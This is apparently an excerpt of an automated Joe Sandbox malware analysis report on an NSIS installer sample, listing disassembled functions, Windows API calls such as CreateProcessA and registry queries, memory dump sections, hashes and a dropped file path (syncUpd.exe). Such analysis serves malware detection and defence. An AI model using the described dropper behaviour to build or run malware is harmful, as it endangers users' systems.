                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2cc29927f3ec91eee7d09198da7ebeb8ff0ee3a72548320396241a9f7b96623c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B3140B18083109FD714AF6AC84839EFBF4AF84344F41C4AEE488A32A1D7788981CF56
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00404AE0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 80COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: TextWindow
                                                                                                                                                                                                                                                              • String ID: ,Xl$@Vl$NSIS Software Setup
                                                                                                                                                                                                                                                              • API String ID: 530164218-621143162
                                                                                                                                                                                                                                                              • Opcode ID: bc2eee6d10165418753e2462cb524adf5d7b8903337a38afe12c1506d900572b
                                                                                                                                                                                                                                                              • Instruction ID: 1ede243bc7e0a0f37790e6dcd7246a005d3f2f3aa806950eac8677958e19fd18
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc2eee6d10165418753e2462cb524adf5d7b8903337a38afe12c1506d900572b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E2187B0A046049FC714DF6AD885A6BB7F5EF88314F44853EE554D73A0E738AC41CB95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040261A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65synchronizationCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SetWindowTextA.USER32 ref: 00407061
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070A1
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070CF
                                                                                                                                                                                                                                                                • Part of subcall function 00406FCB: SendMessageA.USER32 ref: 004070EE
                                                                                                                                                                                                                                                                • Part of subcall function 00407779: CreateProcessA.KERNEL32 ref: 004077D6
                                                                                                                                                                                                                                                                • Part of subcall function 00407779: CloseHandle.KERNEL32 ref: 004077EB
                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32 ref: 00402661
                                                                                                                                                                                                                                                              • GetExitCodeProcess.KERNEL32 ref: 00402688
                                                                                                                                                                                                                                                                • Part of subcall function 00408848: PeekMessageA.USER32 ref: 00408878
                                                                                                                                                                                                                                                                • Part of subcall function 00408848: DispatchMessageA.USER32 ref: 00408884
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 004026C8
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Message$Send$CloseHandleProcess$CodeCreateDispatchExitObjectPeekSingleTextWaitWindow
                                                                                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                                                                                              • API String ID: 3753073698-2564639436
                                                                                                                                                                                                                                                              • Opcode ID: 2214ba7bdc189568a455be81b009e8dfb86b225d28dfd50b280b45856712c657
                                                                                                                                                                                                                                                              • Instruction ID: 544ec22e09db9b9b63bd91d8ef59092599864777349b6283896703cfc9d44c8b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2214ba7bdc189568a455be81b009e8dfb86b225d28dfd50b280b45856712c657
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4219071908600DFD710AF25CD88BAEB7E5EB84315F51887EE489B3380D6795981CF2A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00407B3A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50registryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,Error opening file for writing: C:\Users\user\AppData\Local\Temp\syncUpd.exeClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.,?,00407F99), ref: 00407B74
                                                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32 ref: 00407BAF
                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32 ref: 00407BD5
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • Error opening file for writing: C:\Users\user\AppData\Local\Temp\syncUpd.exeClick Abort to stop the installation,Retry to try again, orIgnore to skip this file., xrefs: 00407B3D
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                              • String ID: Error opening file for writing: C:\Users\user\AppData\Local\Temp\syncUpd.exeClick Abort to stop the installation,Retry to try again, orIgnore to skip this file.
                                                                                                                                                                                                                                                              • API String ID: 3677997916-1796041975
                                                                                                                                                                                                                                                              • Opcode ID: 04dcddf08e360c527b1e55a4c3a8a2cbc3198de9751a6389645462b185e3ee65
                                                                                                                                                                                                                                                              • Instruction ID: 9839350015af9835f4ad81cbc3fb94045c7c8d45cadb0c87d766cd347590a7a3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04dcddf08e360c527b1e55a4c3a8a2cbc3198de9751a6389645462b185e3ee65
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E111C6B090830ADFCB00DF68D58479EBBF4AF49304F00886AE894E7341E774E9148BA2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0041E7BF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 0041E804
                                                                                                                                                                                                                                                                • Part of subcall function 0041EF67: __mtinitlocknum.LIBCMT ref: 0041EF7D
                                                                                                                                                                                                                                                                • Part of subcall function 0041EF67: __amsg_exit.LIBCMT ref: 0041EF89
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 0041E825
                                                                                                                                                                                                                                                              • ___addlocaleref.LIBCMT ref: 0041E843
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __lock$___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                                                              • String ID: }6@
                                                                                                                                                                                                                                                              • API String ID: 2123130959-1554576116
                                                                                                                                                                                                                                                              • Opcode ID: 4988dd665255b82de49f2bf85a03e28f175390610348148788bd2c7651e612d3
                                                                                                                                                                                                                                                              • Instruction ID: 1997a1deaf640d0ed8a0161a337f189d698504a8912b8bbff038bcc8f2134d35
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4988dd665255b82de49f2bf85a03e28f175390610348148788bd2c7651e612d3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA013075504700EBD720AF66D80578ABBE0AF04314F10895FA89556691CBB8A685CB5D
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00402865 Relevance: 6.1, APIs: 4, Instructions: 89libraryloaderCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Library$AddressFreeHandleLoadModuleProc
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1437655972-0
                                                                                                                                                                                                                                                              • Opcode ID: 899ea74c8d291d71f582e2f035b1c68ef5c9c69663d0f49f6d21fce16ee3f2d4
                                                                                                                                                                                                                                                              • Instruction ID: 0852810e427d5eef3f678e97720a95347f79d60f412223e2c5cb2824e44aeaa4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 899ea74c8d291d71f582e2f035b1c68ef5c9c69663d0f49f6d21fce16ee3f2d4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25319EB16083009FD710AF25CD4876EBBE8BF84724F11893EE484A33D0D7788886DB1A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00406FCB Relevance: 6.1, APIs: 4, Instructions: 86windowCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSend$TextWindow
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1596935084-0
                                                                                                                                                                                                                                                              • Opcode ID: 2d215b4a7c55684c2c01937122f4af6b3fafd761fe9b14146eef76cc387a2035
                                                                                                                                                                                                                                                              • Instruction ID: 83727bad7781ca9a6187a820c8695953688329d0e622d1880d2d702268a23253
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2d215b4a7c55684c2c01937122f4af6b3fafd761fe9b14146eef76cc387a2035
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF311CB1D08214AFD710AF69C84466FBBF4EF44714F00C42EE884AB380D779A8458B96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00401482 Relevance: 6.1, APIs: 4, Instructions: 81registryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Close$DeleteOpen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2349717609-0
                                                                                                                                                                                                                                                              • Opcode ID: 73014a65c13e40284ebe0f42eb1fd1590c9d0e459a9cea021c48c3b08f52d076
                                                                                                                                                                                                                                                              • Instruction ID: 133f149d38d78df52dcdbba4d89558d011cdd60c8e07d9ce943be9db895a4237
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73014a65c13e40284ebe0f42eb1fd1590c9d0e459a9cea021c48c3b08f52d076
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 643130B0904304AFD710AF29D94479EBBF4EF84310F40886EE98997350D778C9958F96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00407D37 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CharNextA.USER32(?,?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407D9F
                                                                                                                                                                                                                                                              • CharNextA.USER32(?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407DBE
                                                                                                                                                                                                                                                              • CharNextA.USER32(?,?,?,00000000,?,?,?,004042CE), ref: 00407DCA
                                                                                                                                                                                                                                                              • CharPrevA.USER32(?,?,00000000,?,?,?,004042CE), ref: 00407DE5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 589700163-0
                                                                                                                                                                                                                                                              • Opcode ID: 128b1f827d319e1f67624c76284cc49d88a0dabf465fa48954d28b908fb3de1d
                                                                                                                                                                                                                                                              • Instruction ID: 94f009cbb2cc83b7245da44e9dca2fd274f464f9a0f55bd6391dd9b653ffba1a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 128b1f827d319e1f67624c76284cc49d88a0dabf465fa48954d28b908fb3de1d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 492194B1C082406FEB217F28988067ABFE49F85720F49847EE4849B251D3786C45CB6B
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004223B5 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3016257755-0
                                                                                                                                                                                                                                                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                              • Instruction ID: ef75c4f3debca44e2e824b9e6bf291ec14955cc6fe782112d566702c3ef50ebc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC11B03214015ABBCF126F85ED01CEE3F22BF28354B998516FE1858131C27BC9B2AB95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004076B0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_3BiVM2uOsvGVXA1BoDorVuCU.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3449924974-0
                                                                                                                                                                                                                                                              • Opcode ID: 2da82589d8da42b9739c6c0976e1894f0ad9be4ebc54cecaf41c4c862e70e725
                                                                                                                                                                                                                                                              • Instruction ID: 0b729d7567636c09f29e4728680a85774f46e6e2b236e770b8bd2138b4be8b02
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2da82589d8da42b9739c6c0976e1894f0ad9be4ebc54cecaf41c4c862e70e725
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B110CB1D04208DEDB109FA9D8447DEBFB4EF94354F10882AE944B7250D3796545CBAE
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040298F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 159comCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CoCreateInstance.OLE32 ref: 00402A22
                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000), ref: 00402B6F
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.4479735782.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4476939043.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4481780392.000000000040A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4484778116.000000000040B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000412000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.000000000042B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4487019823.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000E.00000002.4490525316.0000000000437000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
